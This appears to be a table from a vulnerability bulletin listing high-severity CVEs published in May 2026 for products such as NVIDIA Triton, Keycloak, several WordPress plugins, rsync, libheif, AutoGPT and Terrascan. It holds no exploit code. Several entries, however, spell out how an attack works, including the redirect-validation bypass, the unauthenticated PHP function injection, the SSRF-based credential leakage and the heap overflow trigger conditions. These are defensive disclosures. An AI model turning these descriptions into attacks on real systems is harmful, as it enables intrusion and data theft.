| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure. | 2026-05-20 | 9.8 | CVE-2026-24207 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or information disclosure. | 2026-05-20 | 8 | CVE-2026-24213 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service. | 2026-05-20 | 8 | CVE-2026-24214 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to escalation of privileges, denial of service, or information disclosure. | 2026-05-20 | 7.3 | CVE-2026-24206 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24209 |
| NVIDIA–Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 7.5 | CVE-2026-24210 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables. | 2026-05-21 | 8.2 | CVE-2026-48235 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network. | 2026-05-21 | 8.1 | CVE-2026-48241 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations. | 2026-05-21 | 8.1 | CVE-2026-48242 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in tables.php where the multiple POST parameters (tablename, indexname, sortby) are concatenated into table/column identifiers in dynamically constructed SELECT/UPDATE/DELETE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48231 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/fullsit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48232 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48233 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in portal/ajax/list_requests.php where the sort and dir GET parameters are concatenated into the ORDER BY clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48234 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in db_loader.php where the multiple POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) are concatenated into mysqli connection arguments and dynamic SQL operating against an attacker-controlled database without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48236 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in message.php where the frm_ticket_id and frm_resp_id POST parameters are concatenated into WHERE clauses of SELECT/UPDATE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48237 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/mobile_main.php where the id GET parameter is concatenated into the WHERE clause of a SELECT statement used as a ticket-existence sanity check without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48238 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/reports.php where the tick_id POST parameter is concatenated into the WHERE clause of SELECT statements in the incidents summary report without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48239 |
| Open ISES–Tickets | Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. | 2026-05-21 | 7.1 | CVE-2026-48240 |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.1 | CVE-2026-24792 |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS and it cannot be recovered. | 2026-05-19 | 8.4 | CVE-2026-25781 |
| OpenHarmony–OpenHarmony | in OpenHarmony v6.0 and prior versions allow a remote attacker arbitrary code execution in pre-installed apps. | 2026-05-19 | 8.8 | CVE-2026-27648 |
| OPPO–O+ Connect | A local privilege escalation vulnerability exists in O+ Connect because it fails to validate the identity of the caller on the pipe interface. | 2026-05-19 | 7.3 | CVE-2026-22069 |
| Piotnet–Piotnet Addons For Elementor Pro | The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the ‘pafe_ajax_form_builder’ function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4885 |
| Piotnet–Piotnet Forms | The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the ‘piotnetforms_ajax_form_builder’ function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form. | 2026-05-19 | 9.8 | CVE-2026-4883 |
| PixelYourSite–Boost | The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2026-05-20 | 9.8 | CVE-2026-7637 |
| PixelYourSite–Boost | The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the ‘current_url’ and ‘user_name’ parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-9010 |
| pixelyoursite–Cost of Goods by PixelYourSite | The Cost of Goods by PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘csvdata[0][cost_of_goods_value]’ parameter in versions up to, and including, 1.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 7.2 | CVE-2026-7613 |
| PosCube Hardware Software and Consulting Ltd.–QR Menu | Authorization bypass through User-Controlled key vulnerability in PosCube Hardware Software and Consulting Ltd. QR Menu allows Exploitation of Trusted Identifiers. This issue affects QR Menu: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.5 | CVE-2025-13479 |
| PowerDNS–Authoritative | Insufficient Validation of Autoprimary SOA Queries | 2026-05-21 | 7.5 | CVE-2026-42001 |
| projectworlds–hospital-management-system-in-php | A flaw has been found in projectworlds hospital-management-system-in-php 1.0. Affected by this vulnerability is the function getAllPatientDetail of the file update_info.php of the component GET Parameter Handler. Executing a manipulation of the argument appointment_no can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-18 | 7.3 | CVE-2026-8785 |
| projectworlds–Online Art Gallery Shop | A flaw has been found in projectworlds Online Art Gallery Shop 1.0. Impacted is an unknown function of the file /admin/adminHome.php. Executing a manipulation of the argument social_linked can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9364 |
| prosolution–ProSolution WP Client | The ProSolution WP Client plugin for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 2.0.0. This is due to an array validation mismatch where only the first file in the upload array undergoes extension and MIME type validation, while all files are processed and uploaded to a web-accessible directory. This makes it possible for unauthenticated attackers to upload malicious PHP files and achieve remote code execution by sending a valid first file followed by a malicious file. | 2026-05-20 | 9.8 | CVE-2026-6555 |
| Red Hat–Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak’s URL validation logic during redirect operations. By crafting a malicious request, an attacker could bypass validation to redirect users to unauthorized URLs, potentially leading to the exposure of sensitive information within the domain or facilitating further attacks. This vulnerability specifically affects Keycloak clients configured with a wildcard (*) in the “Valid Redirect URIs” field and requires user interaction to be successfully exploited. The issue stems from a discrepancy in how Keycloak and the underlying Java URI implementation handle the user-info component of a URL. If a malicious redirect URL is constructed using multiple @ characters in the user-info section, Java’s URI parser fails to extract the user-info, leaving only the raw authority field. Consequently, Keycloak’s validation check fails to detect the malformed user-info, falls back to a wildcard comparison, and incorrectly permits the malicious redirect. | 2026-05-19 | 8.1 | CVE-2026-7504 |
| Red Hat–Red Hat build of Keycloak 26.2 | A flaw was found in Keycloak. A remote, unauthenticated attacker can send a specially crafted XML input to the Security Assertion Markup Language (SAML) endpoint. This malicious input can cause high CPU usage and worker thread starvation, leading to a Denial of Service (DoS) where the server becomes unavailable. | 2026-05-19 | 7.5 | CVE-2026-7307 |
| Red Hat–Red Hat build of Keycloak 26.2 | A session fixation vulnerability was found in Keycloak’s login-actions endpoints. An unauthenticated attacker could exploit this flaw by pre-creating an authentication session and tricking a victim into visiting a maliciously crafted link. By leveraging the /login-actions/restart endpoint-which processes session handles without adequate CSRF protection or cookie ownership validation-an attacker can reset the authentication flow state. This causes Single Sign-On (SSO) to authenticate the victim transparently upon clicking the link, allowing the attacker to hijack the required-action form without needing the victim’s credentials. A successful exploit could lead to complete account takeover, including highly privileged administrative accounts. | 2026-05-19 | 7.5 | CVE-2026-7507 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege user, with knowledge of user credentials and client ID, can bypass a security control intended to disable the implicit flow in OpenID Connect (OIDC) clients. By manipulating client data during a session restart, an attacker can obtain an access token that should not be available. This vulnerability can also lead to the exposure of these access tokens in server logs, proxy logs, and HTTP Referrer headers, resulting in sensitive information disclosure. | 2026-05-19 | 7.1 | CVE-2026-7571 |
| Red Hat–Red Hat Directory Server 11 | A flaw was found in 389-ds-base. The get_ldapmessage_controls_ext() function in the LDAP server does not enforce an upper bound on the number of controls per LDAP message. A remote, unauthenticated attacker can send a specially crafted LDAP request containing hundreds of thousands of minimal controls within the default maximum BER message size (2 MB), causing excessive CPU consumption and heap allocation on the server. Under concurrent exploitation, this leads to significant latency degradation, worker thread starvation, or out-of-memory termination, resulting in a denial of service. | 2026-05-20 | 7.5 | CVE-2026-9064 |
| Red Hat–Red Hat Hardened Images | A flaw was found in gnutls. A remote attacker could exploit an issue in the Datagram Transport Layer Security (DTLS) packet reordering logic. The comparator function, responsible for ordering DTLS packets by sequence numbers, did not correctly handle packets with duplicate sequence numbers. This could lead to unstable packet ordering or undefined behavior, resulting in a denial of service. | 2026-05-18 | 7.5 | CVE-2026-42009 |
| Redaxo–Redaxo CMS Mediapool | Redaxo CMS Mediapool Addon 5.5.1 and older contains an arbitrary file upload vulnerability that allows authenticated users to bypass file extension blacklist restrictions. Attackers with editor accounts can upload executable files by using obfuscated extensions like php71 or php53 to evade the blacklist filter and execute arbitrary code. | 2026-05-23 | 8.8 | CVE-2018-25353 |
| Repute Infosystems–BookingPress Appointment Booking Pro | The BookingPress Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ‘bookingpress_validate_submitted_booking_form_func’ function in all versions up to, and including, 5.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability can only be exploited if a signature custom field is added to the booking form. | 2026-05-21 | 9.8 | CVE-2026-6960 |
| RsyncProject–rsync | Rsync version 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation. | 2026-05-20 | 8.1 | CVE-2026-43618 |
| RsyncProject–rsync | Rsync versions before 3.4.3 contain a time-of-check to time-of-use (TOCTOU) race condition in daemon file handling that allows attackers to redirect file writes outside intended directories by replacing parent directory components with symbolic links. Attackers with write access to a module path can exploit this race condition to create or overwrite arbitrary files, potentially modifying sensitive system files and achieving privilege escalation when the daemon runs with elevated privileges. This vulnerability can only be triggered if the chroot setting is false. | 2026-05-20 | 7 | CVE-2026-29518 |
| ruby-lang–Ruby | An issue was discovered in Ruby 4 before 4.0.5. A race condition leading to a use-after-free in the pthread-based getaddrinfo timeout handler (rb_getaddrinfo in ext/socket/raddrinfo.c) allows a remote attacker who can delay DNS responses near the user-specified timeout to crash a Ruby process that calls Addrinfo.getaddrinfo(…, timeout:) or Socket.tcp(…, resolv_timeout:). Memory-corruption-based exploitation is theoretically possible. The attack could, for example, be carried out through a crafted authoritative DNS server or recursive resolver. | 2026-05-22 | 8.1 | CVE-2026-46727 |
| Samsung Open Source–Escargot | Use after free vulnerability in Samsung Open Source Escargot allows Pointer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47310 |
| Samsung Open Source–Escargot | Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47311 |
| Samsung Open Source–Escargot | Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 7.8 | CVE-2026-47314 |
| SigmaPlugin–Advanced Database Cleaner Premium | The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the ‘template’ parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-05-20 | 8.8 | CVE-2026-7522 |
| Significant-Gravitas–AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.6.36 through 0.6.50 are vulnerable to Authenticated Session Hijacking via IDOR. If an authenticated attacker can determine the session_id of another user’s session, they can take it over, reading any messages in it and locking the legitimate user out. The PATCH /sessions/{session_id}/assign-user endpoint authenticates the caller but never verifies session ownership: the service layer invokes the session lookup with user_id=None, which the data access layer interprets as a privileged/system call that bypasses the ownership filter, allowing any authenticated user to reassign an arbitrary session to themselves. This issue has been patched in version 0.6.51. | 2026-05-18 | 7.1 | CVE-2026-30950 |
| Significant-Gravitas–AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.4.2 through 0.6.51 are vulnerable to an unauthenticated Denial of Service (DoS) through the server due to uncontrolled disk space consumption. The download_agent_file endpoint creates persistent temporary files for every request but fails to delete them after they are served. An unauthenticated attacker can repeatedly call this endpoint to exhaust the server’s disk space, causing the database or other system services to fail due to “No space left on device” errors, rendering the entire AutoGPT Platform backend unavailable to all users. This issue has been patched in version 0.6.52. | 2026-05-19 | 7.5 | CVE-2026-33232 |
| Significant-Gravitas–AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(…) into Redis and the read path blindly invokes pickle.loads(…) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52. | 2026-05-19 | 7.6 | CVE-2026-33233 |
| Sipp–SIPp | SIPp 3.6 and earlier contains a local buffer overflow vulnerability in command-line argument handling that allows local attackers to crash the application or execute arbitrary code. Attackers can trigger the vulnerability by supplying oversized input to the -3pcc, -i, or -log_file parameters, causing strcpy to write beyond buffer boundaries in sipp.cpp. | 2026-05-23 | 8.4 | CVE-2018-25356 |
| Sitemio Information Technologies Trade Ltd. Co.–WISECP | Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery. This issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-20 | 8 | CVE-2025-11954 |
| SourceCodester–Hospitals Patient Records Management System | A flaw has been found in SourceCodester Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /classes/Master.php?f=save_patient_history. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2026-05-24 | 7.3 | CVE-2026-9355 |
| SourceCodester–Hospitals Patient Records Management System | A vulnerability has been found in SourceCodester Hospitals Patient Records Management System 1.0. This affects an unknown function of the file /admin/patients/manage_history.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-24 | 7.3 | CVE-2026-9356 |
| Splunk–Splunk Enterprise | In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data. | 2026-05-20 | 7.5 | CVE-2026-20239 |
| Splunk–Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.11, and 9.3.12, and Splunk Cloud Platform versions below 10.4.2603.1, 10.3.2512.9, 10.2.2510.11, 10.1.2507.21, 10.0.2503.13, and 9.3.2411.129, a low-privileged user that does not hold the ‘admin’ or ‘power’ Splunk roles could cause a Denial of Service by exploiting the `coldToFrozen.sh` script in the `splunk_archiver` app to rename critical Splunk directories, making the instance non-functional.<br><br>The Denial of Service is possible because of missing input validation in the `coldToFrozen.sh` script, which accepts arbitrary file paths and renames them without restricting operations to safe directories. | 2026-05-20 | 7.1 | CVE-2026-20240 |
| steipete–summarize | Summarize prior to 0.15.1 contains a path traversal vulnerability in the /v1/summarize daemon endpoint that allows authenticated callers to write files to arbitrary directories by supplying an absolute path or directory traversal sequence in the slidesDir request parameter. Attackers can exploit this to write slide_*.png and slides.json files to any writable directory and subsequently delete matching files at the specified location through repeat extraction. | 2026-05-18 | 7.1 | CVE-2026-45242 |
| steipete–summarize | Summarize prior to 0.15.1 contains a vulnerability in the hover summary feature that allows malicious pages to dispatch synthetic mouseover events over attacker-controlled links, causing the extension to make authenticated daemon requests using stored tokens without verifying event trustworthiness. Attackers can place local or private-network URLs behind hoverable links to route authenticated requests through the daemon, potentially accessing sensitive internal endpoints when users interact with attacker-controlled content. | 2026-05-18 | 7.4 | CVE-2026-45245 |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap-buffer-overflow (write) vulnerability in the grid tile compositing, allowing an attacker to write 64 bytes of fully attacker-controlled data past the end of a chroma plane heap allocation by crafting a HEIF/AVIF file with a 1×4 grid of odd-height tiles. The overflow is triggered during normal image decoding with default build configuration. The written bytes are chroma (Cb/Cr) pixel values from the attacking tile, giving the attacker full control over the overflow content. This issue has been fixed in version 1.22.0. | 2026-05-19 | 8.8 | CVE-2026-32740 |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and below contain a heap buffer overflow in MaskImageCodec::decode_mask_image(). When decoding a HEIF file containing a mask image (mski), the function copies the full iloc extent data into a pixel buffer using memcpy(dst, data.data(), data.size()). The copy length data.size() is determined by the iloc extent in the file (attacker-controlled), while the destination buffer is sized based on the declared image dimensions. Because no upper-bound check exists on the data length, a crafted file whose iloc extent exceeds the pixel buffer allocation overflows the heap. The vulnerable single-memcpy branch is reached when the mskC property specifies bits_per_pixel = 8 and the ispe property declares an even width ≥ 64 (so that stride == width), with no changes to default security limits or external codec plugins required. This issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32741 |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap buffer over-read in HeifPixelImage::overlay() in libheif/pixelimage.cc. When compositing an overlay image (iovl) whose child image has a different bit depth for the alpha channel than for the color channels, the function indexes into the alpha plane using the color channel stride (in_stride) instead of the previously retrieved alpha_stride, causing reads past the end of the alpha buffer (up to 3,123 bytes for a 100×50 image with 10-bit color and 8-bit alpha). A crafted HEIF file can exploit this to cause a denial of service (crash) or potentially disclose adjacent heap memory through leaked bytes embedded in the decoded output pixels. This issue has been fixed in versionThis issue has been fixed in version 1.22.0. | 2026-05-19 | 7.1 | CVE-2026-32882 |
| SUSE–Container suse/sle-micro-rancher/5.3:latest | In `src/havegecmd.c`, the `socket_handler` function performs a credential check on the abstract UNIX socket (`�/sys/entropy/haveged`). However, while it detects if the connecting user is not root (`cred.uid != 0`) and prepares a negative acknowledgement (`ASCII_NAK`), it **fails to stop execution**. The code proceeds to the `switch` statement, allowing any local unprivileged user to execute privileged commands such as `MAGIC_CHROOT`. | 2026-05-20 | 7.8 | CVE-2026-41054 |
| SUSE–SUSE Linux Enterprise | `PluginScript` attempts to `chroot` the plugin to the `repoManagerRoot`, this root is frequently `/` (the system root) in standard configurations or when using `–root`. If the chroot target is `/`, it is a no-op, allowing the traversed path to execute host binaries (like `/bin/bash`) with root privileges. | 2026-05-20 | 7.8 | CVE-2026-44933 |
| syslink software AG–Avantra | Insufficient session expiration vulnerability in syslink software AG Avantra on Linux, Windows allows Reusing Session IDs (aka Session Replay). This issue affects Avantra: before 25.3.1. | 2026-05-22 | 9.6 | CVE-2026-8670 |
| syslink software AG–Avantra | Insertion of sensitive information into log file vulnerability in syslink software AG Avantra on Linux, Windows allows Resource Leak Exposure. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 7.5 | CVE-2026-8671 |
| Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a hard-coded credential vulnerability in the embedded web configuration interface where authentication is implemented entirely in client-side JavaScript in login.zhtml, exposing static plaintext credentials in the page source. Unauthenticated attackers with network access can recover administrative credentials directly from the client-side validate() function to obtain full administrative access to the device. | 2026-05-20 | 9.8 | CVE-2026-9139 |
| Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains an authentication bypass vulnerability in the embedded web configuration interface that allows unauthenticated attackers to access internal application pages without any session management or server-side authentication checks. Attackers with network access can directly request internal resources such as index.zhtml, point.zhtml, and log.shtml to gain full administrative read and write access, enabling unauthorized modification of alarm routing, device configuration, and disruption of monitoring and control functions. | 2026-05-20 | 9.8 | CVE-2026-9141 |
| Taiko Network Communications Pte Ltd.–AG1000-01A SMS Alert Gateway | Taiko AG1000-01A SMS Alert Gateway Rev 7.3 and Rev 8 contains a stored cross-site scripting vulnerability in the embedded web configuration interface that allows authenticated attackers to execute persistent JavaScript by fragmenting malicious payloads across multiple administrative form fields. Attackers can bypass front-end length restrictions using JavaScript comments and template literals to concatenate executable script fragments that are rendered in administrative dashboard views such as index.zhtml, resulting in persistent script execution within administrative sessions. | 2026-05-20 | 7.6 | CVE-2026-9144 |
| Talend–Talend Administration Center | A broken access control issue has been identified in the Talend Administration Center, that allows a user with “View” permission to modify the Talend Studio update URL. This issue was resolved in a patch, which is already available. | 2026-05-20 | 8.2 | CVE-2026-9057 |
| tenable–Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the webhook_url parameter in the file scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/local/file/scan) when running in server mode. An unauthenticated remote attacker can supply an arbitrary URL as the webhook_url multipart form parameter. After scanning the uploaded file, Terrascan sends an HTTP POST request to the attacker-controlled URL containing the full scan results as a JSON body, with the attacker-supplied webhook_token forwarded as a Bearer token in the Authorization header. The retryable HTTP client retries up to 10 times on failure. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47356 |
| tenable–Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via the remote_url parameter in the remote directory scan endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) when running in server mode. An unauthenticated remote attacker can supply an attacker-controlled HTTP URL as remote_url with remote_type set to “http”. The URL is passed directly to hashicorp/go-getter (v1.7.5) without validation. Go-getter’s HttpGetter supports the X-Terraform-Get response header, allowing the attacker’s server to redirect the download to a file:// URL, enabling local file read. Additionally, HttpGetter has Netrc set to true, causing it to read ~/.netrc and send stored credentials to attacker-controlled hostnames. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47357 |
| tenable–Terrascan | Terrascan v1.18.3 and prior are vulnerable to Server-Side Request Forgery (SSRF) via external URL resolution in uploaded IaC templates when running in server mode. When Terrascan parses uploaded ARM templates or CloudFormation templates, it resolves external URLs referenced within those templates via hashicorp/go-getter with all default detectors enabled, including FileDetector. An unauthenticated remote attacker can upload an ARM template containing a templateLink.uri or parametersLink.uri field, or a CloudFormation template containing an AWS::CloudFormation::Stack TemplateURL field, pointing to an attacker-controlled URL. Terrascan will fetch the attacker-controlled URL server-side. Unlike SSRF via the remote scan endpoint, file:// URLs are directly usable without requiring an X-Terraform-Get redirect, enabling local file read. This affects deployments running terrascan in server mode (terrascan server), which binds to 0.0.0.0 with no authentication. Note: Terrascan was archived in August 2023 and no patch will be released. | 2026-05-19 | 7.5 | CVE-2026-47358 |
| Tenda–F456 | A security vulnerability has been detected in Tenda F456 1.0.0.5. This affects the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 8.8 | CVE-2026-9389 |
| themefusion–Avada (Fusion) Builder | The Avada Builder (fusion-builder) plugin for WordPress is vulnerable to Unauthenticated Remote Code Execution via PHP Function Injection in versions up to and including 3.15.2. This is due to the `wp_conditional_tags` case in `Fusion_Builder_Conditional_Render_Helper::get_value()` passing attacker-controlled values from a base64-decoded JSON blob directly to `call_user_func()` without any allowlist validation. This is exploitable by unauthenticated attackers through the `fusion_get_widget_markup` AJAX endpoint, which is registered for non-privileged (unauthenticated) users via `wp_ajax_nopriv_fusion_get_widget_markup`. The endpoint is protected only by a nonce (`fusion_load_nonce`), but this nonce is generated for user ID 0 and is deterministically exposed in the JavaScript output of any public-facing page containing a Post Cards (`[fusion_post_cards]`) or Table of Contents (`[fusion_table_of_contents]`) element. This makes it possible for unauthenticated attackers to execute arbitrary code on affected sites. | 2026-05-21 | 9.8 | CVE-2026-6279 |
| themeum–Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation and missing capability check in the ‘downloadZIP’ function in all versions up to, and including, 6.0.6. This makes it possible for unauthenticated attackers to read and delete arbitrary files limited in the WordPress uploads base directory. | 2026-05-19 | 7.5 | CVE-2026-8073 |
| themewant–Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the ‘easyel_handle_register’ function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the ‘administrator’ role during registration and gain administrator access to the site. | 2026-05-20 | 9.8 | CVE-2026-7284 |
